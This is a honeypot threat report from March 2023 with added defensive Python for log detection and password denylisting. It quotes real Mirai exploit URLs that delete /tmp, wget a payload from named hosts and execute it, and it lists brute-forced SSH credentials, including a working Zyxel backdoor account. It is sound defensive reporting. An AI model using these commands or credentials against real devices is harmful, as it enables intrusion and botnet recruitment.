Our selection of alerts on honeypots: report 6 – March 2023

A good understanding of active threats is necessary to achieve a good security posture. The following report presents the trends that emerge from the Internet background noise, based on two weeks of logs from our honeypots.

Top credentials tested by cyber threat actors on the SSH protocol

The chart below lists the credentials most tested on the SSH protocol by cyber threat actors over the past couple of weeks. It is once again a good illustration of which login/password pairs threat actors try on every device connected to the Internet. First tip: make sure that devices which do not need to be reachable from the Internet are not exposed to it.

Furthermore, these credentials, which are widely tested across the Internet, are useful intelligence for building credential dictionaries. For instance, they help your security team prevent the use of these basic credentials on the IT systems you are protecting.

Login       Password
3com        csoRIP000
Admin       Password
ftpuser     3245gs5662d34
git         3245gs5662d34
oracle      123456
oracle      3245gs5662d34
oracle      oracle123
pi          raspberry
postgres    123456
postgres    3245gs5662d34
PSEAdmin    $secure$
support     123456
telnet      123456
ubnt        admin
ubuntu      123456
ubuntu      3245gs5662d34
ubuntu      123456
vadmin      9vt@f3Vt
zyfwp       PrOw!aN_fXp

The last pair, zyfwp/PrOw!aN_fXp, refers to CVE-2020-29583 (CVSSv3: 9.8) in firmware version 4.60 of Zyxel USG devices: this account can be used to log in to the SSH server or the web interface with admin privileges.
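As an added example (not code from the TEHTRIS report), here is how a defender can turn the credential table above into a password denylist and into a detector for sshd failures that target those usernames, with the zyfwp account flagged separately as a CVE-2020-29583 probe. The log lines are constructed from documentation IP ranges; the alert threshold is an assumption.

```python
import re
from collections import defaultdict

# Login/password pairs observed on the honeypots (the table above, duplicates removed).
HONEYPOT_CREDENTIALS = [
    ("3com", "csoRIP000"), ("Admin", "Password"), ("ftpuser", "3245gs5662d34"),
    ("git", "3245gs5662d34"), ("oracle", "123456"), ("oracle", "3245gs5662d34"),
    ("oracle", "oracle123"), ("pi", "raspberry"), ("postgres", "123456"),
    ("postgres", "3245gs5662d34"), ("PSEAdmin", "$secure$"), ("support", "123456"),
    ("telnet", "123456"), ("ubnt", "admin"), ("ubuntu", "123456"),
    ("ubuntu", "3245gs5662d34"), ("vadmin", "9vt@f3Vt"), ("zyfwp", "PrOw!aN_fXp"),
]
TARGETED_USERS = {user for user, _ in HONEYPOT_CREDENTIALS}
WEAK_PASSWORDS = {pw for _, pw in HONEYPOT_CREDENTIALS}

# sshd records the username and source of a failed attempt, never the password tried.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2"
)

def is_denylisted(password):
    """Password-policy hook: reject any password present in the honeypot dictionary."""
    return password in WEAK_PASSWORDS

def analyse_sshd_log(lines, threshold=3):
    """Per source IP: failed count, honeypot-listed usernames tried, Zyxel probe, verdict."""
    report = defaultdict(lambda: {"failed": 0, "listed_users": set(), "zyxel_probe": False})
    for line in lines:
        m = FAILED_RE.search(line)
        if not m:
            continue
        entry = report[m["ip"]]
        entry["failed"] += 1
        if m["user"] in TARGETED_USERS:
            entry["listed_users"].add(m["user"])
        if m["user"] == "zyfwp":  # account from CVE-2020-29583 (Zyxel USG firmware 4.60)
            entry["zyxel_probe"] = True
    for entry in report.values():  # assumed rule: any Zyxel probe, or a listed-user burst
        entry["flag"] = entry["zyxel_probe"] or (
            entry["failed"] >= threshold and bool(entry["listed_users"]))
    return dict(report)

# Constructed sample lines (documentation IP ranges), not honeypot data.
SAMPLE_LOG = [
    "Mar 12 02:14:01 gw sshd[811]: Failed password for invalid user oracle from 198.51.100.7 port 50122 ssh2",
    "Mar 12 02:14:03 gw sshd[811]: Failed password for invalid user postgres from 198.51.100.7 port 50130 ssh2",
    "Mar 12 02:14:05 gw sshd[811]: Failed password for invalid user ubuntu from 198.51.100.7 port 50141 ssh2",
    "Mar 12 02:15:10 gw sshd[812]: Failed password for invalid user zyfwp from 203.0.113.9 port 41002 ssh2",
    "Mar 12 02:16:00 gw sshd[813]: Failed password for alice from 192.0.2.4 port 53001 ssh2",
]
```

Running `analyse_sshd_log(SAMPLE_LOG)` flags 198.51.100.7 (three listed usernames) and 203.0.113.9 (zyfwp probe) but not the single failure from 192.0.2.4.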

Our honeypots – unavoidable victims of Mirai botnet

Week after week, our honeypots are relentlessly hit by threat actors trying to enrol more and more devices into their Mirai botnet fleet. They target any device connected to the Internet in order to build a botnet large enough to be effective in massive attacks such as DDoS.

The threat actors use the same User-Agent: Hello, world.

In March, our worldwide honeypots were targeted with the following URLs:

/shell?cd+/tmp;rm+-rf+*;wget+94.158.247[.]123/jaws;sh+/tmp/jaws

The IP address 94.158.247[.]123 (hosted by AS 39798 MivoCloud SRL – US) included in the URL above is flagged as Mirai botnet for 2023 in VirusTotal. 55 IP addresses targeted our worldwide honeypots with this URL request.

/shell?cd+/tmp;rm+-rf+*;wget+128.199.134[.]42/jaws;sh+/tmp/jaws

The IP address 128.199.134[.]42 (hosted by AS 14061 DIGITALOCEAN-ASN – SG) included in the URL above is flagged as Mirai botnet in VirusTotal. 55 IP addresses targeted our worldwide honeypots with this URL request.

/shell?cd+/tmp;rm+-rf+*;wget+botbet.catbbos[.]fun/jaws;sh+/tmp/jaws

The domain botbet.catbbos[.]fun included in the URL above (created a month ago) is flagged as Mirai botnet in VirusTotal. 52 IP addresses targeted our worldwide honeypots with this URL request.

/shell?cd+/tmp;rm+-rf+*;wget+45.77.243.49/jaws;sh+/tmp/jaws

The IP address 45.77.243.49 (hosted by AS 20473 AS-CHOOPA – SG) included in the URL above is flagged as malicious in VirusTotal. 45 IP addresses targeted our worldwide honeypots with this URL request.

The threat actors tried to exploit a shell command execution vulnerability in MVPower digital video recorders, which may allow remote attackers to execute commands on vulnerable systems. It is known as CVE-2016-20016 (CVSSv3: 9.8).
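As an added example (not code from the TEHTRIS report), the following routine detects the /shell request pattern above in web-server access logs, decodes the command the DVR would have run, and extracts the download host as a defanged indicator for blocklists. The log lines and the dropper host names are constructed (documentation IP ranges and an .example domain), not the report's indicators.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log line: src ident user [time] "req" status bytes "referer" "user-agent"
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Download stage of the chain: wget <ip-or-domain>[:port]/<file>
WGET_RE = re.compile(r"wget\s+(?:https?://)?(?P<host>[A-Za-z0-9.\-]+)(?::\d+)?/(?P<file>[^\s;|&]+)")

def defang(host):
    """Render the last dot as [.] so the indicator cannot be clicked or resolved by accident."""
    head, sep, tail = host.rpartition(".")
    return f"{head}[.]{tail}" if sep else host

def parse_jaws_attempt(line):
    """Return details of an MVPower DVR /shell (CVE-2016-20016) exploit attempt, else None."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    if path != "/shell":
        return None
    cmd = unquote_plus(query)  # '+' becomes a space and %xx is decoded, as the DVR would see it
    w = WGET_RE.search(cmd)
    return {
        "src": m["src"],
        "user_agent": m["ua"],
        "command": cmd,
        "dropper_host": defang(w["host"]) if w else None,
        "dropper_file": w["file"] if w else None,
        "wipes_tmp": "rm -rf" in cmd and "/tmp" in cmd,
    }

def scan_access_log(lines):
    """Return all detections plus the set of defanged dropper hosts to feed into blocklists."""
    hits = [h for h in map(parse_jaws_attempt, lines) if h]
    return hits, {h["dropper_host"] for h in hits if h["dropper_host"]}

# Constructed sample lines (documentation IP ranges and an .example domain, not the report's indicators).
SAMPLE_ACCESS_LOG = [
    '198.51.100.20 - - [12/Mar/2023:03:10:11 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+203.0.113.77/jaws;sh+/tmp/jaws HTTP/1.1" 404 162 "-" "Hello, world"',
    '198.51.100.21 - - [12/Mar/2023:03:12:40 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+dropper.example/jaws;sh+/tmp/jaws HTTP/1.1" 404 162 "-" "Hello, world"',
    '192.0.2.8 - - [12/Mar/2023:03:13:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_ACCESS_LOG))
```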

We found that 75% of the IP addresses targeting our honeypots were from Vietnam, the rest being Chinese. 41% of these IP addresses are not listed in public databases of known malicious IP addresses.

Here is the breakdown by AS:

AS                                                                       %
AS 140803 (8, 195 Street, Thang Town, Hiep Hoa, Bac Giang, Viet Nam)     75%
AS 4134 Chinanet                                                         10%
AS 4837 CHINA UNICOM China169 Backbone                                   2.5%
AS 56040 China Mobile communications corporation                         2.5%
AS 140903 CHINA TELECOM                                                  2.5%
AS 4837 CHINA UNICOM China169 Backbone                                   2.5%
AS 4847 China Networks Inter-Exchange                                    2.5%
AS 56040 China Mobile communications corporation                         2.5%

IoCs:


Top ports/protocols targeted by threat actors

Port          Protocol
445           TCP
22            TCP
23            TCP
80            TCP
6379          TCP
9100 & 9115   TCP
443           TCP
8088          TCP
5060          UDP
5555          TCP

It is good practice to block incoming traffic to unused ports, while the ports that must stay open are carefully monitored and protected.

DoS & DDoS Attempts monitored on our honeypots


CVE-2022-27255 exploit attempts monitored on our honeypots


Information remains TEHTRIS' sole property and reproduction is forbidden

TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

No warranty and liability

TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assumes no responsibility for anyone's use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied, regarding the accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.